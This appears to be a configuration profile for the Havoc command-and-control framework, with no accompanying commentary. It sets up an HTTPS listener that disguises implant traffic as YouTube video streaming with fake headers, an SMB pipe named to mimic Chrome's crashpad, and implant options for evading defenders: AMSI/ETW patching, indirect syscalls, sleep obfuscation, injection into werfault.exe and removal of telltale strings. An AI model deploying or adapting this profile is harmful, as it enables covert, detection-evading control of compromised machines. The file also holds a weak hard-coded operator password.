Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "byinarie" {
        Password = "qwerty"
    }
}

Listeners {
    Http {
        Name         = "HTTPS"
        Hosts        = [
            "127.0.0.1", 
        ]
        HostBind     = "127.0.0.1" 
        HostRotation = "round-robin"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        KillDate     = "2025-12-01 12:00:00"
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.2739.67"

        Uris = [
            "/youtube/v1/video/stream",
            "/youtube/v2/video/stream",
            "/yt/v1/mp4/stream",
            "/yt/v2/mp4/stream"                                    
        ]

        Headers = [
            "Accept: video/mp4",
            "Referer: https://www.youtube.com/",
            "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.2739.67",
            "Accept-Encoding: gzip, deflate, br",
            "Origin: https://www.youtube.com",
            "X-Requested-With: XMLHttpRequest" 
        ]

        Response {
            Headers = [
                "Content-Type: video/mp4",
                "Server: youtube.com",
                "X-Content-Type-Options: nosniff",
                "Cache-Control: public, max-age=31536000",
                "Content-Length: 4500644572",  
                "X-Cache: HIT",  
                "Access-Control-Allow-Origin: https://www.youtube.com",
                "Access-Control-Allow-Credentials: true",
                "Connection: keep-alive"
            ]
        }
    }

    Smb {
        Name     = "SMB Crashpad"
        PipeName = "crashpad_4440_LKJHGRFTYQWEXVPO"
    }
}

Demon {
    Sleep = 15
    Jitter = 8
    IndirectSyscall = true
    StackDuplication = true
    SleepTechnique = "Zilean"
    AmsiEtwPatching = "Hardware breakpoints"
    ProxyLoading = "none"
    TrustXForwardedFor = false
    Injection {
        Spawn64 = "C:\\Windows\\System32\\werfault.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\werfault.exe"
    }
    Binary {
        ReplaceStrings-x64 = {
            "demon.x64.dll": "",
            "This program cannot be run in DOS mode.": "",
            "%c%c%c%c%c%c%c%c%cMSSE-%d-server": "%c%c%c%c%c%c%c%c%cDdisplayPipe",

        }

        ReplaceStrings-x86 = {
            "demon.x86.dll": "",
            "This program cannot be run in DOS mode.": "",
            "%c%c%c%c%c%c%c%c%cMSSE-%d-server": "%c%c%c%c%c%c%c%c%cDdisplayPipe",
        }
    }
}